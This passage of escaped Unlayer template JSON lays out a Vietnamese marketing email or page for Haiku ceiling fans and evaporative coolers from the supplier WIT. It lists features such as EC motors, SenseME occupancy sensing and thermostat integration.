Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_34\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">S\\u1ef1 k\\u1ebft h\\u1ee3p ho\\u00e0n h\\u1ea3o v\\u1ec1 gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t tr\\u00ean cao (Ceilinfg Fan) v\\u00e0 qu\\u1ea1t l\\u00e0m m\\u00e1t bay h\\u01a1i (Evaporative Coolers) \\u0111\\u1ec3 mang l\\u1ea1i l\\u1ee3i \\u00edch c\\u1ee7a kh\\u1ea3 n\\u0103ng l\\u00e0m m\\u00e1t t\\u1ea1i ch\\u1ed7 m\\u1ea1nh m\\u1ebd v\\u00e0 t\\u1ed1c \\u0111\\u1ed9 kh\\u00f4ng kh\\u00ed cao \\u0111\\u1ebfn m\\u1ecdi ng\\u00f3c ng\\u00e1ch trong c\\u01a1 s\\u1edf c\\u1ee7a b\\u1ea1n. Khi \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng song song v\\u1edbi qu\\u1ea1t tr\\u00ean cao, qu\\u1ea1t \\u0111i\\u1ec1u ho\\u00e0 th\\u1ed5i s\\u00e0n.<\\/p>\\\"}},{\\\"id\\\":\\\"n_o-ffptTr\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM &gt;&gt;<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_23\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"IDFyoBWrMw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ErgQ9PafL2\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301489264-home_space.jpg\\\",\\\"width\\\":1000,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_16\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_24\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_15\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"n2Rt0hOclz\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WFmH-Wf1GI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hYIdln7nfa\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596365970938-7G9GXVu.jpg\\\",\\\"width\\\":650,\\\"height\\\":44,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jSRLw3ca9U\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#f4f4f4\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"8UTkIYmcBT\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"RpVX_niF28\\\",\\\"contents\\\":[{\\\"id\\\":\\\"gPBUcCFrJJ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366368130-9kP2jpS.png\\\",\\\"width\\\":225,\\\"height\\\":225,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"4MHo-ShRhP\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>Gi\\u00e1m S\\u00e1t B\\u1eb1ng C\\u00f4ng Ngh\\u1ec7 Th\\u00f4ng Minh<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"kyTBdsZF_O\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">B\\u1ea1n qu\\u00ean t\\u1eaft qu\\u1ea1t ho\\u1eb7c \\u0111\\u00e8n. C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 s\\u1eed d\\u1ee5ng c\\u1ea3m bi\\u1ebfn h\\u1ed3ng ngo\\u1ea1i th\\u1ee5 \\u0111\\u1ed9ng s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng b\\u1eadt\\/t\\u1eaft qu\\u1ea1t, \\u0111\\u00e8n khi b\\u1ea1n r\\u1eddi kh\\u1ecfi ph\\u00f2ng.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"p4RiMp7cwe\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zOj4Xd1cbd\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366402742-jV0TkYE.png\\\",\\\"width\\\":536,\\\"height\\\":536,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"JKp-uk_1ew\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>\\u0110\\u1ed9ng C\\u01a1 EC Si\\u00eau Ti\\u1ebft Ki\\u1ec7m \\u0110i\\u1ec7n<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"58BbvH-LPq\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">Thi\\u1ebft k\\u1ebf \\u0111\\u1ed9ng c\\u01a1 EC Haiku\\u00ae mang t\\u00ednh \\u0111\\u1ed9t ph\\u00e1 c\\u00f4ng ngh\\u1ec7, kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 g\\u1ea5p 4 l\\u1ea7n theo ti\\u00eau chu\\u1ea9n ENERGY START\\u00ae<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"1APzGPG5g5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"bkVasKmXfw\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366425358-2AnQ9PF.png\\\",\\\"width\\\":606,\\\"height\\\":606,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xJ8-pi5ho1\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>K\\u1ebft N\\u1ed1i Thi\\u1ebft B\\u1ecb C\\u1ea3m Nhi\\u1ec7t Th\\u00f4ng Minh<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"OqO7YI2s5y\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">Haiku gh\\u00e9p k\\u1ebft n\\u1ed1i v\\u1edbi b\\u1ed9 \\u0111i\\u1ec1u nhi\\u1ec7t Nest Learning\\u2122, Ecobee gi\\u00fap ti\\u1ebft ki\\u1ec7m t\\u1edbi 30% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m cho h\\u1ec7 \\u0111i\\u1ec1u h\\u00f2a.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"_PcMK1X4yS\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"SLKCtEotoL\\\",\\\"contents\\\":[{\\\"id\\\":\\\"xwLkIIZRCW\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#f4f4f4\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Efymfftppu\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366476320-ddd.png\\\",\\\"width\\\":650,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"m2TKvu6Gqi\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"38nTlPeqaL\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZZdxZXscg_\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 44px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%; text-align: center;\\\\\\\">Vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng kh\\u00f4ng kh\\u00ed, ho\\u1ea1t \\u0111\\u1ed9ng b\\u1ec1n b\\u1ec9, kh\\u00f4ng ti\\u1ebfng \\u1ed3n - qu\\u1ea1t tr\\u1ea7n v\\u00e0 qu\\u1ea1t th\\u1ed5i s\\u00e0n l\\u1edbn tr\\u1edf th\\u00e0nh xu h\\u01b0\\u1edbng nhi\\u1ec1u gia \\u0111\\u00ecnh Vi\\u1ec7t Nam hi\\u1ec7n nay. Ngo\\u00e0i ra, vi\\u1ec7c s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd t\\u1ea1o gi\\u00f3 t\\u1ef1 nhi\\u00ean v\\u00e0 th\\u00f4ng tho\\u00e1ng \\u0111\\u1ed1i l\\u01b0u kh\\u00f4ng kh\\u00ed ph\\u00e2n b\\u1ed5 \\u0111\\u1ed3ng \\u0111\\u1ec1u c\\u00e1c m\\u00f9a quanh n\\u0103m, ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n c\\u1ef1c k\\u1ef3 hi\\u1ec7u qu\\u1ea3 th\\u1eddi gian s\\u1eed d\\u1ee5ng li\\u00ean t\\u1ee5c. Th\\u00eam v\\u00e0o \\u0111\\u00f3, \\u0111\\u1ec3 th\\u1ed5i s\\u00e0n ho\\u1eb7c mu\\u1ed1n c\\u00f3 lu\\u1ed3ng gi\\u00f3 th\\u1ed5i c\\u00f3 h\\u01b0\\u1edbng m\\u1ea1nh trong m\\u1ed9t kh\\u00f4ng gian l\\u1edbn th\\u00ec \\u0111\\u00e3 c\\u00f3 qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p. L\\u00fac n\\u00e0y b\\u1ea1n c\\u00f3 nhi\\u1ec1u l\\u1ef1a ch\\u1ecdn ki\\u1ec3u d\\u00e1ng qu\\u1ea1t l\\u00e0m m\\u00e1t t\\u1eeb nh\\u00e0 cung c\\u1ea5p WIT - \\u0111\\u01a1n v\\u1ecb cung c\\u1ea5p qu\\u1ea1t ch\\u1ea5t l\\u01b0\\u1ee3ng cao nh\\u1eadp kh\\u1ea9u \\u0111\\u1ed3ng b\\u1ed9 nguy\\u00ean 